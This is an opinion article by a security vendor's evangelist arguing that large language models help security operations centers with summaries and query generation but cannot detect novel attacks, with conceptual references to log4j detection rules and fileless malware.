The Limits of New AI Technology in the Security Operations Center

While some think large-language models are the do-everything solution for security operations centers (SOC), they must understand that LLMs aren't that smart yet.

Augusto Barros, Cyber-Security Evangelist, Securonix

August 29, 2024

5 Min Read
robot hand with a security shield
Pitinan Piyavatin via Alamy Stock

Cybersecurity is experiencing the AI revolution. Every day, there is an announcement of a new product or feature leveraging LLMs to make the security operations faster, more precise or more efficient. The most excited pundits are already talking about fully autonomous SOCs, with the job of the security analyst being condemned to extinction.  

But are we really about to see AI take over our threat detection and response capabilities? 

As the advent of the AI singularity is still a possibility, I cannot say that a fully autonomous, AI-powered SOC will never exist. But claiming that the current wave of AI capabilities will lead to it is naive at best and, often, dishonest marketing from tech vendors.  

The generative AI capabilities are indeed impressive, but they are still limited. Based on a lot of training data, GenAI systems create text, images and even music. But these creations are bounded by ideas and concepts that have been created by humans. Original ideas are still far beyond the grasp of current systems.  

These systems are limited because they do not understand the concepts and ideas they are working with and are just generating streams of text similar to their training sets. We've been surprised at how close to real intelligence this simple approach appears to be. Yet, deeper exploration will show clear signs of “glorified autocomplete,” as some people have described. 

Related:How Safe and Secure Is GenAI Really?

A few examples of “failures” from these systems can give a better understanding of their limitations: Many LLMs struggle to give a proper answer to something like “How many r’s are there in strawberry?”, or “what is the world record for crossing the English Channel entirely on foot?” are perfect illustrations of the issue. It’s not that ChatGPT, or any other of these systems, is clueless; it has no idea about what it’s “saying”. Once we understand that there is no cognitive understanding of the underlying concepts being communicated, it's hard to even say these mistakes are failures. 

You may ask, why are we seeing so many interesting, useful implementations of these technologies? The answer is that they perform well for certain problems, those where the lack of cognitive ability and full understanding of the data and associated concepts are not significant disadvantages. LLMs are great at generating text summaries, for example.  

That’s why one of the most successful implementations of AI for security operations is creating text explanations and summaries of incidents and investigations. A great use case for LLMs is the simple generation of search queries or detection code from a human-generated explanation. But for now, that’s where most things stop.  

Related:10 Ways Employees Are Sabotaging Your Cybersecurity Stance

The threat detection problem is risky territory for SOCs using LLMs because it may look like the models can create detection content for us. I can get a decent result if I ask Microsoft Copilot to generate something like this: “Generate a sigma rule to detect a log4j attack.” But if we delve deeper into this question and the generated answer, we can understand how limited AI still is for threat detection. 

  • By saying “log4j attack”, I'm prompting the model to build content based on a well-known attack. Humans had to find and understand these attacks before all that content was produced. There is a time window between the first attacks occurring and then being found, properly understood and described by humans before the AI had the content available to ingest and be able to produce a rule. This is definitely not an unknown attack. 

  • The rule created is generic and based on the most well-known exploitation methods of a known vulnerability. Although it works, it's a brittle approach that will generate as many false positives and negatives as a rule generated by an average human analyst. 

Related:Are Enterprises Investing Too Much or Too Little in AI Now?

People are excited about the power of these new models, claiming that LLMs will soon detect unknown attacks. They are wrong because of the limitations of AI technology and the concept of unknown attacks. To better understand the limitations of not only AI, but of any traditional detection systems, we can look at the emergence of fileless attacks.  

Malware detection systems once focused solely on files written to disk. They had hooks that could be used to call the analyzer every time something was written to the disk. What if we had an extremely efficient AI-based analyzer doing this job? Does it mean we have achieved a perfect anti-malware solution? No, because the attackers have now shifted their actions to places where data was not being collected to be analyzed. Fileless malware can be injected into memory and never written to disk, so our super AI would never be exposed to that malicious code. The initial assumption that all malware would be written to disk is no longer correct, and the AI system simply would not be looking in the right place.  

Why New Attacks Are Hard to Detect  

Smart attackers find out how detection systems work and then develop new attacks that go out of the visibility area of the detection engine. Attack ingenuity happens on multiple levels, and those levels often bypass the areas where our detection capabilities are placed. An IP network may be fully instrumented to capture traffic, but it will be useless if one of the systems is compromised via a Bluetooth vulnerability. 

There is no AI system capable of analyzing attack behavior on that level, finding the differences from previous behavior and designing a solution to compensate for those changes. That's still a human job, and it will stay like that until artificial general intelligence (AGI) is here. 

Know the Limits of AI in the SOC 

With any tool, we need to understand its value, where it is useful and its limitations. We are getting a lot of value from GenAI-based capabilities to support security operations. But they are not a panacea. Organizations should not stretch them to places where they don’t excel, or the result will not only be underwhelming, but it will also be disastrous. 

About the Author

Augusto Barros

Cyber-Security Evangelist, Securonix

Augusto Barros is an established security professional, currently serving as VP Cyber Security Evangelist at Securonix. In this role, Barros works to strategically deliver the best threat cloud native detection and response solutions. He helps customers around the globe leverage the latest SIEM advancements with best-in-class analytics to avoid cyber threats and optimize ROI. Before joining Securonix, he spent five years as a research analyst at Gartner, talking to thousands of clients and vendors about their security operations' challenges and solutions. His previous positions include security roles at CIBC and Finastra. 

Never Miss a Beat: Get a snapshot of the issues affecting the IT industry straight to your inbox.

You May Also Like


More Insights